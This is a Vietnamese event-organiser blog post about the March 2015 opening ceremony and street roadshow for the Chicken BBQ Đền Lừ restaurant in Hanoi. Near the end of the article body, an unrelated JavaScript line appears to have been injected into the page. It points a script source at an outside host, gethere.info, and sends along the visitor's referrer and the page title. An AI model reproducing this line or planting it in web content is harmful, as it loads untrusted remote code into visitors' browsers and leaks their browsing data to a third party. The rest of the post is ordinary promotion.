Home / Tin sự kiện / Sự kiện khai trương nhà hàng Chicken BBQ Đền Lừ(09/03/2015)

Sự kiện khai trương nhà hàng Chicken BBQ Đền Lừ(09/03/2015)

Sự kiện khai trương nhà hàng chicken bbq Đền Lừ diễn ra ngày 09/03/2015. Buổi lễ khai trương diễn ra chuyên nghiệp với hàng loạt sự kiện diễn ra mừng khai trương nhà hàng.

khai_truong_1 khai_truong_3

 

Buổi lễ diễn ra trong sự hân hoan của mọi người cũng như toàn bộ khách mời. Trong âm nhạc sối động của ban nhạc sống chuyên nghiệp cùng ca sỹ đã góp phần tạo nên sự thành công và rực rỡ của buổi lễ khai trương.

khai_truong_4

 

Trước buổi lễ khai trương là chương trình roadshow giới thiệu chương trình khai trương nhà hàng trên đường phố Hà Nội đã thu hút sự chú ý của toàn bộ người dân bắt gặp đoàn roadshow cùng sự tò mò không hề nhỏ mà mọi người dành cho đoàn roadshow.

khai_truong_5

 

Công ty cổ phần truyền thông và sự kiện Á Đông rất hân hạnh là nhà tổ chức chương trình khai trương nhà hàng chicken bbq Đền Lừ ngày 09/03/2015. Sự chuyên nghiệp trong khâu tổ chức cùng sự nhiệt tình của đội ngũ nhân viên đã tạo nên sự thành công ngoài mong đợi của buổi lễ mang đến sự hài lòng cho khách hàng. Đó cũng chính là tiêu chí của chúng tôi”Sự hài lòng của khách hàng là thành công của chúng tôi”.

Cảm ơn nhà hàng chicken bbq Đền Lừ đã chọn PG Á Đông để thực hiện chương trình khai trương này!

s.src=’https://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About quản trị viên

Check Also

Tuyển dụng PG roadshow Sunfly lần II (05/03/2015)

{HN-RS} PG Á Đông tuyển dụng PGs cho chương trình roadshow XE ĐẠP diễn ra trong 1 ngày 05/03/2015, …

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *